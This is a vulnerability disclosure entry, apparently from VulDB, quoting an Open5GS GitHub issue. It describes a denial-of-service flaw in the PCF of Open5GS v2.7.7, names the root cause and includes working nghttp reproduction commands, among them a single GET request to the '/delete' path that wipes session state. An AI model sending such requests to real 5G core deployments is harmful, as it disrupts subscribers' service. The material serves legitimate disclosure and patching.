| タイトル | Open5gs PCF v2.7.7 Denial of Service |
|---|
| 説明 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
PCF incorrectly dispatches the `/sm-policies/{smPolicyId}/delete` subresource to
the SM policy delete handler without checking the HTTP method.
Unlike the app-session bug, the delete handler here expects a
`SmPolicyDeleteData` body. A plain `GET` therefore fails inside
`pcf_npcf_smpolicycontrol_handle_delete()`, and the failure is escalated into a
state-machine exception. The top-level PCF FSM then clears the entire session
context via `PCF_SESS_CLEAR(sess)`.
So an attacker with a valid `smPolicyId` can destroy the PCF session state
using only `GET /.../delete`, even though the route should require a `POST`
with a valid delete body.
### Root cause
Method-confused dispatch:
- `src/pcf/sm-sm.c:91-99`
Delete handler rejects missing body:
- `src/pcf/npcf-handler.c:569-574`
Failure escalated to session exception and clear:
- `src/pcf/sm-sm.c:95-99`
- `src/pcf/pcf-sm.c:283-288`
- `src/pcf/context.h:89-99` (`PCF_SESS_CLEAR`)
The sibling route without `/delete` behaves correctly:
- `GET /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}` returns `405`
and leaves the session intact.
### Steps to reproduce
This live repro used an existing `sm-policy` resource:
```text
location: http://pcf.open5gs.org/npcf-smpolicycontrol/v1/sm-policies/1
```
1. Control request:
```bash
IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' pcf)
nghttp -v "http://$IP/npcf-smpolicycontrol/v1/sm-policies/1"
```
2. Probe that the session still exists by creating an app-session on the same
UE IPv4:
```bash
cat >/tmp/policyauth_logic_create.json <<'EOF'
{"ascReqData":{"suppFeat":"1","notifUri":"http://10.33.33.1:18081/af-callback","ueIpv4":"10.45.0.2","medComponents":{"1":{"medCompN":1,"medType":"AUDIO","medSubComps":{"1":{"fNum":1,"fDescs":["permit out"],"flowUsage":"NO_INFO"}}}}}}
EOF
nghttp -v -H':method: POST' -H'content-type: application/json' \
-d /tmp/policyauth_logic_create.json \
"http://$IP/npcf-policyauthorization/v1/app-sessions"
```
3. Attack request:
```bash
nghttp -v "http://$IP/npcf-smpolicycontrol/v1/sm-policies/1/delete"
```
4. Probe the same UE/session again:
```bash
nghttp -v -H':method: POST' -H'content-type: application/json' \
-d /tmp/policyauth_logic_create.json \
"http://$IP/npcf-policyauthorization/v1/app-sessions"
```
### Logs
```shell
Control path:
GET /npcf-smpolicycontrol/v1/sm-policies/1 -> HTTP/2 405
{"title":"Invalid HTTP method","status":405,...}
The session still existed:
POST /npcf-policyauthorization/v1/app-sessions -> HTTP/2 201
Attack path:
GET /npcf-smpolicycontrol/v1/sm-policies/1/delete -> HTTP/2 400
{"title":"[imsi-001011234567891:1] No SmPolicyDeleteData","status":400,...}
But the `400` also destroyed the session context. The same app-session create
probe immediately changed to:
POST /npcf-policyauthorization/v1/app-sessions -> HTTP/2 404
{"title":"Not found","status":404,...}
PCF logs:
[imsi-001011234567891:1] No SmPolicyDeleteData
[imsi-001011234567891:1] pcf_npcf_smpolicycontrol_handle_delete() failed
[Unknown:1] State machine exception
Not found [/npcf-policyauthorization/v1/app-sessions]
```
### Expected behaviour
`GET /sm-policies/{smPolicyId}/delete` should be rejected as an invalid method and must not alter session state.
### Observed Behaviour
The `GET` request is routed into delete handling, fails on missing body, and the resulting exception clears the whole PCF session context.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| ソース | ⚠️ https://github.com/open5gs/open5gs/issues/4440 |
|---|
| ユーザー | LinZiyu (UID 94035) |
|---|
| 送信 | 2026年04月20日 20:38 (1 月 ago) |
|---|
| モデレーション | 2026年05月09日 09:35 (19 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 362442 [Open5GS 迄 2.7.7 delete Endpoint src/pcf/sm-sm.c pcf_npcf_smpolicycontrol_handle_delete サービス拒否] |
|---|
| ポイント | 20 |
|---|